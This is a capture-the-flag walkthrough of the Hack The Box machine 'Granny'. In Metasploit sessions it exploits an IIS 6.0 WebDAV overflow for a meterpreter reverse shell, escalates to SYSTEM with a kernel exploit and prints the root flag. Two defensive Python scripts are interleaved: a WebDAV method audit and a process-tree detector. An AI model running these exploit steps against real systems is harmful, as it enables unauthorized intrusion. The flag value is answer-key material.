Walkthrough of HTB VM "Granny".
So, if you read the article on the VM "Grandpa", this should be easy. There's not much new to learn here; we just get a chance to play around with privilege escalation and some post-exploitation, so nothing really too difficult.
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Server Date: Fri, 30 Apr 2021 12:36:38 GMT
Again we're up against a WebDAV server, so we already know an exploit for this. Let's fire up msfconsole.
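From the defender's side, the interesting part of that scan is the verb list: an IIS 6.0 host that publicly advertises PUT, DELETE, COPY and MOVE is what the rest of this walkthrough relies on. The following is an added example (mine, not code from the original post): a small Python audit script that parses the headers of an HTTP OPTIONS response and flags the write-capable and information-leaking WebDAV verbs. The response it runs on is constructed to mirror the nmap output above, and the split into "write" and "info" method sets is my own choice. The audit_host helper sends a single OPTIONS request, meant for servers you administer.

```python
"""WebDAV method audit: added example for this walkthrough, not code from the
original post. Parses the headers of an HTTP OPTIONS response and reports which
verbs the server advertises that let clients write, move or delete content.
The SAMPLE_RESPONSE below is constructed to mirror the nmap output above."""
import http.client

# Verbs that create, modify or remove content. A public IIS endpoint that
# advertises these without authentication is exposing WebDAV write access.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# Verbs that mostly leak structure or are rarely needed by a browser.
INFO_METHODS = {"TRACE", "PROPFIND", "SEARCH"}

# Constructed OPTIONS response (not captured from the box), using the verb
# lists the nmap http-webdav-scan script reported.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "DAV: 1, 2\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw):
    """Return {lower-cased name: value} for the headers of a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def advertised_methods(headers):
    """Union of the verbs listed in the Allow and Public headers."""
    methods = set()
    for name in ("allow", "public"):
        for verb in headers.get(name, "").split(","):
            verb = verb.strip().upper()
            if verb:
                methods.add(verb)
    return methods


def audit(raw):
    """Summarise the exposure of one OPTIONS response as a dict."""
    headers = parse_headers(raw)
    methods = advertised_methods(headers)
    write = sorted(methods & WRITE_METHODS)
    return {
        "server": headers.get("server", ""),
        # A DAV header or any DAV-only verb means the WebDAV extension is on.
        "webdav_enabled": "dav" in headers or bool(methods & {"PROPFIND", "MKCOL", "PROPPATCH"}),
        "write_methods": write,
        "info_methods": sorted(methods & INFO_METHODS),
        "risky": bool(write),
    }


def audit_host(host, port=80, path="/"):
    """Send one OPTIONS request to a server you administer and audit the reply."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    status = "HTTP/1.1 %d %s\r\n" % (resp.status, resp.reason)
    raw = status + "".join("%s: %s\r\n" % (k, v) for k, v in resp.getheaders()) + "\r\n"
    conn.close()
    return audit(raw)


if __name__ == "__main__":
    for key, value in audit(SAMPLE_RESPONSE).items():
        print("%-15s %s" % (key, value))
```

Run against the sample, the audit reports eight write-capable verbs and marks the host as risky; the same headers from a hardened server (WebDAV extension disabled, or the verb list trimmed to GET/HEAD/POST/OPTIONS) come back clean. On IIS 6 the WebDAV web service extension is switched off in IIS Manager, and an unpatched IIS 6.0 should not be reachable from untrusted networks at all.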
msf6 > search webdav
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution
1 exploit/windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
2 exploit/windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
3 auxiliary/scanner/http/webdav_internal_ip normal No HTTP WebDAV Internal IP Scanner
4 auxiliary/scanner/http/webdav_scanner normal No HTTP WebDAV Scanner
5 auxiliary/scanner/http/webdav_website_content normal No HTTP WebDAV Website Content Scanner
6 exploit/windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection
7 exploit/windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
8 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
9 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
10 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
11 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
12 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
13 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation
14 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution
15 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
16 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
17 exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution
18 exploit/windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
19 exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection
20 exploit/windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server
21 exploit/multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve
22 exploit/multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
23 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
24 exploit/windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection
25 exploit/windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection
26 exploit/windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
27 exploit/windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker
28 exploit/windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
29 post/windows/escalate/droplnk normal No Windows Escalate SMB Icon LNK Dropper
30 exploit/windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload
Interact with a module by name or index. For example info 30, use 30 or use exploit/windows/http/xampp_webdav_upload_php
msf6 > use 16
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOST 10.129.2.63
RHOST => 10.129.2.63
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.129.2.63
[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.129.2.63:1030) at 2021-04-30 14:38:42 +0200
So, we got a meterpreter shell. We can assume that we'll need elevated rights, which means local exploits, so let's get set up for that before we background meterpreter and head to the post modules.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
784 396 svchost.exe
804 396 svchost.exe
956 396 spoolsv.exe
984 396 msdtc.exe
1104 396 cisvc.exe
1144 396 svchost.exe
1200 396 inetinfo.exe
1236 396 svchost.exe
1328 396 VGAuthService.exe
1428 396 vmtoolsd.exe
1480 396 svchost.exe
1620 396 svchost.exe
1788 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1832 396 alg.exe
1932 396 dllhost.exe
2476 596 wmiprvse.exe
2808 1480 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3444 2808 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1788
[*] Migrating from 3444 to 1788...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
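Before moving on to the suggester, note what that process list gives a defender: rundll32.exe (PID 3444) has the IIS worker w3wp.exe (PID 2808) as its parent, and it is the very process the session landed in and was migrated away from, so the spawn itself is the moment to alert on, not what is still running later. Here is an added example, not code from the original post, of the parent-child check a log-review script or EDR rule would apply. It parses a constructed process list in the same column layout as the ps output above and reports every process whose ancestry includes an IIS worker. The worker and suspicious-child name sets are my assumptions.

```python
"""Process-tree check for IIS worker children: added example for this
walkthrough, not code from the original post. Parses a process list in the
column layout of the meterpreter ps output (PID PPID Name ...) and reports
every process that descends from an IIS worker process. SAMPLE_PS is a
constructed list, not a capture from the box."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid name")

# Processes that serve HTTP/WebDAV on IIS 6; none of them should normally
# spawn shells, script hosts or loaders. (Assumed set, extend for your estate.)
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe", "davcdata.exe"}
# Children that are worth an alert on their own when the parent is a web worker.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe",
}

# Constructed sample, mirroring rows from the ps output above.
SAMPLE_PS = r"""PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
4 0 System
396 348 services.exe
596 396 svchost.exe
1480 396 svchost.exe
1788 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2808 1480 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3444 2808 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
"""


def parse_ps(text):
    """Map pid -> Proc. Only the first three columns are needed, so rows whose
    user or path fields contain spaces parse the same as bare rows."""
    procs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].isdigit() or not parts[1].isdigit():
            continue  # header, separator or malformed row
        procs[int(parts[0])] = Proc(int(parts[0]), int(parts[1]), parts[2].lower())
    return procs


def ancestry(procs, pid):
    """Process names from pid up to the root, nearest first; stops on a pid
    that is not in the list or on a cycle (PID 0 lists itself as parent)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].name)
        pid = procs[pid].ppid
    return chain


def find_web_spawned(procs):
    """Return (pid, name, nearest_web_ancestor, suspicious) for every process
    with an IIS worker somewhere above it in the tree."""
    findings = []
    for p in sorted(procs.values()):
        parents = ancestry(procs, p.ppid)
        web = [a for a in parents if a in WEB_WORKERS]
        if web:
            findings.append((p.pid, p.name, web[0], p.name in SUSPICIOUS_CHILDREN))
    return findings


if __name__ == "__main__":
    for pid, name, parent, bad in find_web_spawned(parse_ps(SAMPLE_PS)):
        print("%s pid %d %s spawned under %s" % ("ALERT" if bad else "note ", pid, name, parent))
```

On the sample this yields a single finding, rundll32.exe under w3wp.exe, flagged as suspicious. In production the same rule is fed from process-creation telemetry rather than a snapshot, for example Sysmon Event ID 1 with its ParentImage field, because a snapshot taken after the attacker has migrated (as above) no longer shows the offending child at all.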
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.2.63 - Collecting local exploits for x86/windows...
[*] 10.129.2.63 - 37 exploit checks are being tried...
[+] 10.129.2.63 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.2.63 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.2.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Launching notepad to host the exploit...
[+] Process 220 launched.
[*] Reflectively injecting the exploit DLL into 220...
[*] Injecting exploit into 220 ...
[*] Exploit injected. Injecting payload into 220...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.2.63
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.129.2.63:1031) at 2021-04-30 14:41:07 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
And we got SYSTEM. Let's find some flags.
meterpreter > search -f user.txt
Found 1 result...
c:\Documents and Settings\Lakis\Desktop\user.txt (32 bytes)
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
aa4beed1c0584445ab463a6747bd06e9
So, we're done. Did we learn something? Well, not much, except that we got a chance to revisit migration and some post-exploitation stuff, so maybe that's good enough?